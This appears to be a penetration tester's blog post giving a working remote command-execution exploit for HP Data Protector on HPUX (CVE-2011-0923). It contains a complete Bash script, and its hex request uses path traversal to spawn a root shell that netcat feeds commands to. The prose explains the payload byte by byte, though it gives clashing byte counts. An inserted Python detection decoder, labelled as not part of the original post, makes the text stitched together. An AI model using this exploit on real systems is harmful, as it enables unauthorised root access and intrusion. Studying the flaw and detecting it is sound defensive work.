HP Data Protector Remote Shell for HPUX

In many pentests I have done, HPUX is one of the more common UNIX operating systems I have found. It is a strong operating system running on robust hardware, and when I got to know the Lights Out functionality I just fell in love with it. Although many companies use it to run the main part of their business, I have found that they don't pay much attention to its security, so it is common to find production servers without patches or even running applications on insecure protocols like Telnet, FTP or even rlogin.

Since HPUX has been around for a long time and HP was concerned about its security, HP created the Bastille project for HPUX. I have used it to secure servers and I can say that it's great! You have to be really careful, because it closes a lot of stuff and it may, no sorry, it will break connectivity with your oldest applications (by the way, it moves the user hashes to the /tcb/files/auth/ folder ;) ). This doesn't mean you can just run out tomorrow, apply Bastille to your servers and forget about them... YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-

So this week I was working on a pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed; it wasn't looking so good. Looking around I found that Data Protector has this nasty vulnerability and that fdisk had created a PoC for this zero day, but for Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project, which you can see in his blog) the server was compromised with root.... w00t w00t!

So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don't own. You can also download it from my Hacking Projects section.


#!/bin/bash
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks
# Lots of thanks to David Llorens (@c4an) for all the help.
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits/17339/
#
# Shouts to shellhellboy, r3x, r0d00m, etlow,
# psymera, nitr0us and ppl in #mendozaaaa
#

# Usage: HOST PORT COMMAND...  (the sample output line is what "id" returned)
if [ $# -lt 3 ]; then
    echo "Syntax: $(basename "$0") HOST PORT COMMAND"
    echo
    echo "$(basename "$0") 10.22.33.44 5555 id"
    echo "X15 [12:1] uid=0(root) gid=0(root)"
    exit 0
fi

HOST=$1
PORT=$2
shift 2
# Everything after HOST and PORT is the command line handed to the shell.
CMD="$*"

# Request bytes: a 4-byte length header followed by NUL-terminated fields.
# The "C" / "20" pair selects the exec function; the last field is the
# traversal path to /usr/bin/sh, and the trailing NULs pad the request.
SC=""
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SHELLCODE=${SC}

# Send the request, then the command line, and print whatever comes back.
( echo -en "${SHELLCODE}" ; echo "${CMD}" ) | nc -w1 "${HOST}" "${PORT}"

This script is in Bash and can run on any Linux such as Backtrack, or on Windows using Cygwin. This is how it works:

The shellcode is 168 bytes and is injected directly into the port. The first 8 bytes of the 104 bytes of this shellcode are part of the protocol, where we use the flag "C 20" to tell Data Protector (I found that if this value is manipulated other things can be accomplished, even writing directly to /) to perform the vulnerable function that allows remote connections and executes files within its local bin directory.


"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
"\x74\x2d\x00\x20\x30\x00\x20\x30\x00"

But if we use the directory path traversal technique we can execute any binary within the file system. The next part was tricky: I could execute any command, but I was unable to pass arguments to it directly, so after some debugging I found I could spawn /usr/bin/sh, closing the request with null bytes to reach the complete 168 bytes, and if I concatenate the command to execute, it is passed directly to the shell, which runs it with the user's environment variables (in this case root's) and returns the output.


"\x20\x2e\x2e\x2f\x2e\x2e\x2f"
"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
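To recognise this kind of request on the wire (for example in a packet-capture triage script or as the logic behind an IDS rule), here is an added decoder for the framing described above. It is not part of the original post or of Data Protector, and it assumes only the layout visible in the bytes on this page: a 4-byte big-endian length, then space-led NUL-terminated fields, with the opcode after "C" and the program name in the last field; frame_request and the two sample requests are constructed here for illustration.

```python
import struct

TRAVERSAL_MARKERS = ("../", "..\\")


def parse_request(data):
    """Split one request into its fields: a 4-byte big-endian length, then
    fields that each start with a space and end with a NUL. Trailing NUL
    padding decodes to empty fields, which are dropped."""
    if len(data) < 4:
        raise ValueError("request shorter than its 4-byte length header")
    (length,) = struct.unpack(">I", data[:4])
    body = data[4:4 + length]
    if len(body) < length:
        raise ValueError("request body truncated: header says %d bytes" % length)
    fields = [f.lstrip(b" ").decode("latin-1") for f in body.split(b"\x00")]
    return [f for f in fields if f]


def inspect_request(data):
    """Return the opcode (field after "C"), the program name (last field) and
    whether that name can only resolve outside the service's bin directory."""
    fields = parse_request(data)
    opcode = None
    if "C" in fields:
        i = fields.index("C")
        if i + 1 < len(fields):
            opcode = fields[i + 1]
    program = fields[-1] if fields else ""
    escapes = program.startswith("/") or any(m in program for m in TRAVERSAL_MARKERS)
    return {"opcode": opcode, "program": program, "escapes_bin_dir": escapes}


def frame_request(fields, pad=0):
    """Constructed helper: build a request in the layout above for samples."""
    body = b"".join(b" " + f.encode("latin-1") + b"\x00" for f in fields) + b"\x00" * pad
    return struct.pack(">I", len(body)) + body


# Constructed samples, not captured traffic. PAGE_REQUEST reproduces the field
# sequence of the bytes shown above; BENIGN_REQUEST keeps the same layout but
# names a placeholder program that stays inside the bin directory.
PAGE_REQUEST = frame_request(
    ["2", "--ch0ks-", "0", "SYSTEM", "-ch0ks--", "C", "20", "--ch0ks-", "Poc",
     "-r00t-r00t-", "-r00t-r00t-", "-r00t-r00t-", "0", "0", "../" * 9 + "usr/bin/sh"],
    pad=25)
BENIGN_REQUEST = frame_request(
    ["2", "--", "0", "SYSTEM", "--", "C", "20", "--", "Poc", "0", "0", "some_bin"])
```

Running inspect_request over each request read from a capture and alerting when opcode is "20" and escapes_bin_dir is true flags the traversal variant while leaving in-directory exec requests alone.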

So in the end I got this to work with:


( echo -en "${SHELLCODE}" ; echo "${CMD}" ) | nc -w1 "${HOST}" "${PORT}"

Netcat transports the shellcode to the port and returns the output. It simply works.

So special thanks to fdisk for the PoC and to David Llorens for the useful brainstorming; he also ported this tool to the Metasploit Project, which you can see in his blog.

Adrian Puente Z.
